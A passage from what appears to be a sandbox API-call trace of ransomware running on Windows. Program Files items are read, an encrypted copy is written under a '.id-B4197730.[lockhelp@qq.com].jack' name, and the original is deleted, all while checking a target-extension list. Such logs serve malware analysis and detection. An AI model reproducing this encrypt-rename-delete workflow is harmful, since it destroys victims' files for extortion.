returned 4 [0201.381] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.381] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.381] lstrlenW (lpString=".zip") returned 4 [0201.381] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.381] lstrlenW (lpString=".rar") returned 4 [0201.381] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.381] lstrlenW (lpString=".bz2") returned 4 [0201.381] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.381] lstrlenW (lpString=".7z") returned 3 [0201.381] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.381] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.381] lstrlenW (lpString=".dbf") returned 4 [0201.381] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.381] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.381] lstrlenW (lpString=".1cd") returned 4 [0201.381] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.381] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0201.381] lstrlenW (lpString=".jpg") returned 4 [0201.381] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.381] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0201.381] lstrlenW (lpString="win32_MoveNoDrop32x32.gif") returned 25 [0201.382] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.708] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=153) returned 1 [0201.720] CloseHandle (hObject=0x3d4) returned 1 [0201.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif")) returned 0x20 [0201.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.720] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.720] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.720] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.720] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0201.721] GetLastError () returned 0x0 [0201.721] ReadFile (in: hFile=0x3d4, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x99, lpOverlapped=0x0) returned 1 [0201.722] WriteFile (in: hFile=0x434, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xa0, lpOverlapped=0x0) returned 1 [0201.723] ReadFile (in: hFile=0x3d4, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.723] WriteFile (in: hFile=0x434, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x106, lpOverlapped=0x0) returned 1 [0201.723] SetEndOfFile (hFile=0x434) returned 1 [0201.723] CloseHandle (hObject=0x434) returned 1 [0201.724] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.724] SetEndOfFile (hFile=0x3d4) returned 1 [0201.725] CloseHandle (hObject=0x3d4) returned 1 [0201.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.725] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif")) returned 1 [0201.726] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.726] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.726] lstrlenW (lpString=".doc") returned 4 [0201.726] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.726] lstrlenW (lpString=".docx") returned 5 [0201.726] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.726] lstrlenW (lpString=".pdf") returned 4 [0201.726] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.726] lstrlenW (lpString=".xls") returned 4 [0201.726] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.726] lstrlenW (lpString=".xlsx") returned 5 [0201.726] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.726] lstrlenW (lpString=".ppt") returned 4 [0201.726] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.726] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.726] lstrlenW (lpString=".zip") returned 4 [0201.726] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.726] lstrlenW (lpString=".rar") returned 4 [0201.726] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.726] lstrlenW (lpString=".bz2") returned 4 [0201.726] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.726] lstrlenW (lpString=".7z") returned 3 [0201.726] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.726] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.726] lstrlenW (lpString=".dbf") returned 4 [0201.726] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.727] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.727] lstrlenW (lpString=".1cd") returned 4 [0201.727] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.727] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.727] lstrlenW (lpString=".jpg") returned 4 [0201.727] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.727] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.727] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.727] lstrlenW (lpString=".doc") returned 4 [0201.727] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.727] lstrlenW (lpString=".docx") returned 5 [0201.727] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.727] lstrlenW (lpString=".pdf") returned 4 [0201.727] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.727] lstrlenW (lpString=".xls") returned 4 [0201.727] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.727] lstrlenW (lpString=".xlsx") returned 5 [0201.727] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.727] lstrlenW (lpString=".ppt") returned 4 [0201.727] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.727] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.727] lstrlenW (lpString=".zip") returned 4 [0201.727] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.728] lstrlenW (lpString=".rar") returned 4 [0201.728] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.728] lstrlenW (lpString=".bz2") returned 4 [0201.728] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.728] lstrlenW (lpString=".7z") returned 3 [0201.728] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.728] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.728] lstrlenW (lpString=".dbf") returned 4 [0201.728] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.728] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.728] lstrlenW (lpString=".1cd") returned 4 [0201.728] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.728] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0201.728] lstrlenW (lpString=".jpg") returned 4 [0201.728] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.728] lstrcmpiW (lpString1=".VBS", lpString2=".jack") returned 1 [0201.728] lstrlenW (lpString="OSPP.VBS") returned 8 [0201.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.729] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=94467) returned 1 [0201.729] CloseHandle (hObject=0x3d4) returned 1 [0201.729] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs")) returned 0x20 [0201.729] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.729] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.729] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0201.729] GetLastError () returned 0x0 [0201.729] ReadFile (in: hFile=0x3d4, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x17103, lpOverlapped=0x0) returned 1 [0201.792] WriteFile (in: hFile=0x434, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x17110, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x17110, lpOverlapped=0x0) returned 1 [0201.794] ReadFile (in: hFile=0x3d4, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.794] WriteFile (in: hFile=0x434, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xe4, lpOverlapped=0x0) returned 1 [0201.794] SetEndOfFile (hFile=0x434) returned 1 [0201.794] CloseHandle (hObject=0x434) returned 1 [0201.797] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.797] SetEndOfFile (hFile=0x3d4) returned 1 [0201.798] CloseHandle (hObject=0x3d4) returned 1 [0201.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.799] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs")) returned 1 [0201.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.799] lstrlenW (lpString=".doc") returned 4 [0201.799] lstrcmpiW (lpString1=".doc", lpString2=".VBS") returned -1 [0201.799] lstrlenW (lpString=".docx") returned 5 [0201.799] lstrcmpiW (lpString1=".docx", lpString2="P.VBS") returned -1 [0201.799] lstrlenW (lpString=".pdf") returned 4 [0201.799] lstrcmpiW (lpString1=".pdf", lpString2=".VBS") returned -1 [0201.799] lstrlenW (lpString=".xls") returned 4 [0201.799] lstrcmpiW (lpString1=".xls", lpString2=".VBS") returned 1 [0201.799] lstrlenW (lpString=".xlsx") returned 5 [0201.799] lstrcmpiW (lpString1=".xlsx", lpString2="P.VBS") returned -1 [0201.799] lstrlenW (lpString=".ppt") returned 4 [0201.799] lstrcmpiW (lpString1=".ppt", lpString2=".VBS") returned -1 [0201.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.799] lstrlenW (lpString=".zip") returned 4 [0201.799] lstrcmpiW (lpString1=".zip", lpString2=".VBS") returned 1 [0201.799] lstrlenW (lpString=".rar") returned 4 [0201.799] lstrcmpiW (lpString1=".rar", lpString2=".VBS") returned -1 [0201.799] lstrlenW (lpString=".bz2") returned 4 [0201.799] lstrcmpiW (lpString1=".bz2", lpString2=".VBS") returned -1 [0201.799] lstrlenW (lpString=".7z") returned 3 [0201.799] lstrcmpiW (lpString1=".7z", lpString2="VBS") returned -1 [0201.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.800] lstrlenW (lpString=".dbf") returned 4 [0201.800] lstrcmpiW (lpString1=".dbf", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.800] lstrlenW (lpString=".1cd") returned 4 [0201.800] lstrcmpiW (lpString1=".1cd", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.800] lstrlenW (lpString=".jpg") returned 4 [0201.800] lstrcmpiW (lpString1=".jpg", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.800] lstrlenW (lpString=".doc") returned 4 [0201.800] lstrcmpiW (lpString1=".doc", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString=".docx") returned 5 [0201.800] lstrcmpiW (lpString1=".docx", lpString2="P.VBS") returned -1 [0201.800] lstrlenW (lpString=".pdf") returned 4 [0201.800] lstrcmpiW (lpString1=".pdf", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString=".xls") returned 4 [0201.800] lstrcmpiW (lpString1=".xls", lpString2=".VBS") returned 1 [0201.800] lstrlenW (lpString=".xlsx") returned 5 [0201.800] lstrcmpiW (lpString1=".xlsx", lpString2="P.VBS") returned -1 [0201.800] lstrlenW (lpString=".ppt") returned 4 [0201.800] lstrcmpiW (lpString1=".ppt", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.800] lstrlenW (lpString=".zip") returned 4 [0201.800] lstrcmpiW (lpString1=".zip", lpString2=".VBS") returned 1 [0201.800] lstrlenW (lpString=".rar") returned 4 [0201.800] lstrcmpiW (lpString1=".rar", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString=".bz2") returned 4 [0201.800] lstrcmpiW (lpString1=".bz2", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString=".7z") returned 3 [0201.800] lstrcmpiW (lpString1=".7z", lpString2="VBS") returned -1 [0201.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.800] lstrlenW (lpString=".dbf") returned 4 [0201.800] lstrcmpiW (lpString1=".dbf", lpString2=".VBS") returned -1 [0201.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.800] lstrlenW (lpString=".1cd") returned 4 [0201.801] lstrcmpiW (lpString1=".1cd", lpString2=".VBS") returned -1 [0201.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0201.801] lstrlenW (lpString=".jpg") returned 4 [0201.801] lstrcmpiW (lpString1=".jpg", lpString2=".VBS") returned -1 [0201.801] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0201.801] lstrlenW (lpString="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 53 [0201.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.802] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=387356) returned 1 [0201.802] CloseHandle (hObject=0x3d4) returned 1 [0201.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml")) returned 0x220 [0201.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0201.802] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.802] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0201.803] GetLastError () returned 0x0 [0201.803] ReadFile (in: hFile=0x3d4, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x5e91c, lpOverlapped=0x0) returned 1 [0203.044] WriteFile (in: hFile=0x434, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x5e920, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x5e920, lpOverlapped=0x0) returned 1 [0203.052] ReadFile (in: hFile=0x3d4, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0203.052] WriteFile (in: hFile=0x434, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0203.052] SetEndOfFile (hFile=0x434) returned 1 [0203.052] CloseHandle (hObject=0x434) returned 1 [0203.062] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.062] SetEndOfFile (hFile=0x3d4) returned 1 [0203.066] CloseHandle (hObject=0x3d4) returned 1 [0203.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0203.067] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml")) returned 1 [0203.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.857] lstrlenW (lpString=".doc") returned 4 [0203.857] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0203.857] lstrlenW (lpString=".docx") returned 5 [0203.857] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0203.857] lstrlenW (lpString=".pdf") returned 4 [0203.857] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0203.857] lstrlenW (lpString=".xls") returned 4 [0203.857] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0203.857] lstrlenW (lpString=".xlsx") returned 5 [0203.857] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0203.857] lstrlenW (lpString=".ppt") returned 4 [0203.857] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0203.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.857] lstrlenW (lpString=".zip") returned 4 [0203.857] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0203.857] lstrlenW (lpString=".rar") returned 4 [0203.857] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0203.857] lstrlenW (lpString=".bz2") returned 4 [0203.857] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0203.857] lstrlenW (lpString=".7z") returned 3 [0203.857] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0203.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.857] lstrlenW (lpString=".dbf") returned 4 [0203.858] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.858] lstrlenW (lpString=".1cd") returned 4 [0203.858] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.858] lstrlenW (lpString=".jpg") returned 4 [0203.858] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0203.858] lstrlenW (lpString=".doc") returned 4 [0203.858] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString=".docx") returned 5 [0203.858] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0203.858] lstrlenW (lpString=".pdf") returned 4 [0203.858] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString=".xls") returned 4 [0203.858] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString=".xlsx") returned 5 [0203.858] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0203.858] lstrlenW (lpString=".ppt") returned 4 [0203.858] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0203.858] lstrlenW (lpString="C:\\Program 